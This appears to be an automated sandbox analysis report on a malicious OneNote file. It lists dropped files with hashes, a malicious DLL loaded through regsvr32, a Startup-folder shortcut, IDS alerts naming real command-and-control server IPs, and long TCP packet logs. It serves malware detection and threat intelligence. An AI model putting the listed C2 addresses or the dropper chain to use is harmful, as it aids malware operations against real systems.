                                                                                                                                                                                                                  Preview:...................................FL..................F.@.. .....Q{....r.F.X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qVo.....................V........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qVo......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qVo......].....................u..O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qVu...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Fri Mar 17 15:20:20 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1251
                                                                                                                                                                                                                  Entropy (8bit):4.669782338096886
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:8/o2BAdOE+KRShCh7+oAyNqzWFUTdCDhxYUUZAxA+w7aB6m:8PBAdO70fh7+PGqzWFwdCDtrB6
                                                                                                                                                                                                                  MD5:7449249EFCCD9946BE36801726E11BFF
                                                                                                                                                                                                                  SHA1:8174C7030225A0C445C09A9F23469DF43F267826
                                                                                                                                                                                                                  SHA-256:078D25B9842A1034F788DC98DDB0236C1B41B04922578D6ACD141363DAD20D7A
                                                                                                                                                                                                                  SHA-512:82D7461DE995307E01326180A59D2671EFEA3E5F0FCCE53CB9E57DF0E328C72C17775A7324303CBDED9EA51D28FA1A84B8F2F2DD2BBD30E40B638879C722F371
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:L..................F.... ....>-.......A^.X...>-......h...........................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qVo.....................V........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qVo......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qVo......].....................u..O.f.f.i.c.e.1.6.....f.2..h...F(. .ONENOTEM.EXE..J.......F(.qV................................O.N.E.N.O.T.E.M...E.X.E.......l...............-.......k...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.U.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........*................@Z|...K.J.........`.......X.......287400...........!a..%.H.VZAj...+.........

                                                                                                                                                                                                                  C:\Users\user\Desktop\Insight_Medical_Publishing_1.one

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):121940
                                                                                                                                                                                                                  Entropy (8bit):6.705453297369133
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:bDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:HBoC+tCYvSMVnte8ZP1Y6Jm
                                                                                                                                                                                                                  MD5:506B754C89F003550E1EA6E4FC1D2E37
                                                                                                                                                                                                                  SHA1:D3C89F17FF60E351574D4262940DF5F9E7099E3D
                                                                                                                                                                                                                  SHA-256:9D9FFDF814CECB397D2990E573FE587A64813F588D190DA1BFA3037B8F0947AF
                                                                                                                                                                                                                  SHA-512:A16776BCC0E0575ED50A2209A3A77A11251E9CB9A3EEDD2CAA6BA617551BE19A7D7FB1DF225A7CEF477040E3DE4EEC382F9DC4F41E0CBE5C79BE94C195D4C058
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: JoeSecurity_MalOneNote, Description: Yara detected Malicious OneNote, Source: C:\Users\user\Desktop\Insight_Medical_Publishing_1.one, Author: Joe Security
                                                                                                                                                                                                                  Preview:.R\{..M..Sx.).......i.E.....&.................?.....I.......*...*...*...*..................................................._fh.*..E.......n..w.....................h...........................T...............`[P...A.|Z.*+Qu;............TL.E..!..................................<.7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):6184
                                                                                                                                                                                                                  Entropy (8bit):1.2345471012109028
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YRxbYyf1e/jVoOHf+qTwJjCAS0VS3cVkxTifDDO:Gbn1exoOH2hJuNODDO
                                                                                                                                                                                                                  MD5:B86BBA27B7A7512A1409FF3DF43694DD
                                                                                                                                                                                                                  SHA1:DF32FFF28E1BD50685102D288B248111C089CCD3
                                                                                                                                                                                                                  SHA-256:F4D6C7910A83492C14F28C431DFE74EDA4D05BE5A77BB95AED5ECF5E4F0FFE4D
                                                                                                                                                                                                                  SHA-512:069083C11CE2DA6E3D9AEACC86764A4608B43ECBFE9DA4D6252187418A41E29517129E08AC4D8911CF68BC22809F3DBB725D7C4E1F44D35C37AAD4C2B01B68DB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:./.C..vL....W"v_"N...%G...]...G................?.....I...............................................................................................................h...........................(..................ii..K.`..,.<.........:a..~..L.r..`.3..............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):360056
                                                                                                                                                                                                                  Entropy (8bit):7.518932341257607
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:tDRaioLd5d1QI6vUih4AIqECkIwJ5HUvFOAjNPyFj8XTcrOQMpuNBSbmeq:Qd5d1AvUiWqrkIwJ5wOuqF2TcOQMBbS
                                                                                                                                                                                                                  MD5:C88E20186C061F472FA74F136232C754
                                                                                                                                                                                                                  SHA1:F48F0728F799094B1FEE865569AB984C60382278
                                                                                                                                                                                                                  SHA-256:32FA473ADC23BCA735D5212C1BCB44A79DF14E5433CB5C5DA563E55F0D1BC41D
                                                                                                                                                                                                                  SHA-512:25B6A5D5A9C1AD536F797567EF86F19AE340A9C9D99D1E6930B470F3D077BB020EC7A71990F8DAD357AA994DDE555374DECEA56401EA9F9925ABF0196431E4CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.R\{..M..Sx.).....<!4M.#..^p.................?.....I.......*...*...*...*...................a..............................."N...%G...]...G0....z..................h...........................x~......0........M....J../D.7w...........sHr.J..|..T...............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Windows\System32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):316928
                                                                                                                                                                                                                  Entropy (8bit):7.337848702590508
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                                                                                                                                  MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                                                                                                                                  SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                                                                                                                                  SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                                                                                                                                  SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:data
                                                                                                                                                                                                                  Entropy (8bit):6.7306385281228875
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Microsoft OneNote note (16024/2) 100.00%
                                                                                                                                                                                                                  File name:Insight_Medical_Publishing_1.one
                                                                                                                                                                                                                  File size:120428
                                                                                                                                                                                                                  MD5:f44cb44a2dec6fce42d41a947ca5c120
                                                                                                                                                                                                                  SHA1:44672a849c91752c91fbbfeb91e300a3656352ea
                                                                                                                                                                                                                  SHA256:d894d541d5d911265a4e60a04c413939a14105072a67f5a3d50de2d0002d0003
                                                                                                                                                                                                                  SHA512:cf397154d33ef391533d0b186aef3dba09f2e0ed71cd6f8700116796b54cc4c6e12645529a504cdb795736467ca75c072058a4e78ea5b170baef7d1b8dc59c35
                                                                                                                                                                                                                  SSDEEP:1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXs:1BoC+tCYvSMVnte8ZP1Y6Jc
                                                                                                                                                                                                                  TLSH:45C32BF1A8025C0AE123C976B1FB661399D051ED42283B2BF87D507DD978A20D6DD8EF
                                                                                                                                                                                                                  File Content Preview:.R\{...M..Sx.).......i.E......&.................?......I........*...*...*...*..................................................._fh.*..E.......n..w.....................h...........................8....... ....... ..}...M..t:."S.9.............TL.E..!......

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:d4dce0626664606c

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  192.168.2.791.121.146.474970480802404344 03/17/23-09:20:51.270439TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 23497048080192.168.2.791.121.146.47
                                                                                                                                                                                                                  192.168.2.7182.162.143.56497074432404312 03/17/23-09:21:02.839170TCP2404312ET CNC Feodo Tracker Reported CnC Server TCP group 749707443192.168.2.7182.162.143.56
                                                                                                                                                                                                                  192.168.2.766.228.32.314970670802404330 03/17/23-09:20:57.543366TCP2404330ET CNC Feodo Tracker Reported CnC Server TCP group 16497067080192.168.2.766.228.32.31
                                                                                                                                                                                                                  192.168.2.7167.172.199.1654970980802404308 03/17/23-09:21:14.589789TCP2404308ET CNC Feodo Tracker Reported CnC Server TCP group 5497098080192.168.2.7167.172.199.165
                                                                                                                                                                                                                  192.168.2.7104.168.155.1434971480802404302 03/17/23-09:21:29.091364TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 2497148080192.168.2.7104.168.155.143

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.563940048 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.564001083 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.564099073 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.567151070 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:07.567192078 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.172075987 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.172233105 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.175463915 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.175496101 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.175961971 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.220447063 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.453624964 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.453666925 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.770797014 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.770827055 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.770837069 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.770941019 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.770967007 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:08.814882040 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.059906006 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.059926033 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.060020924 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.060075998 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.060092926 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.060122013 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.060142994 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.060170889 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.064779043 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.064836025 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.064935923 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.111104965 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.111141920 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.158008099 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.354861021 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.354878902 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.354919910 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.354947090 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.354955912 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355034113 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355061054 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355082989 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355092049 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355103016 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355118990 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355118990 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355122089 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355142117 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355145931 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355151892 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355169058 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355199099 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355212927 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355232000 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355252981 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355262995 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355290890 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.355324030 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.358762980 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.358906031 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.358935118 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.408015966 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.682902098 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.682965040 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683022022 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683080912 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683208942 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683208942 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683238983 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683263063 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683274984 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683288097 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683310032 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683324099 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683362007 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683362007 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683417082 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683423996 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683434963 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683490038 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683554888 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683554888 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683568954 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683588982 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683645010 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683713913 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683713913 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683729887 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.683753967 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.684017897 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.684017897 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.684031963 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.736404896 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.943373919 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.943510056 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.943605900 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.943605900 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.943645000 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.943944931 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945075989 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945202112 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945277929 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945277929 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945302010 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945344925 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945456028 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945755005 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945839882 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945839882 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.945867062 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946139097 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946194887 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946214914 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946259022 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946259022 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946476936 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946667910 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946731091 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946731091 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946754932 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946820974 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946887970 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946887970 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946902037 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.946952105 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947012901 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947012901 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947031021 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947071075 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947125912 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947125912 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947141886 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947230101 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947308064 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947308064 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947323084 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947398901 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947457075 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947457075 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947468996 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947596073 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.947596073 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948194981 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948385000 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948447943 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948448896 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948470116 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948586941 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948664904 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948664904 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948688984 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948708057 CET44349701203.26.41.131192.168.2.7
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948761940 CET49701443192.168.2.7203.26.41.131
                                                                                                                                                                                                                  Mar 17, 2023 09:20:09.948761940 CET49701443192.168.2.7203.26.41.131
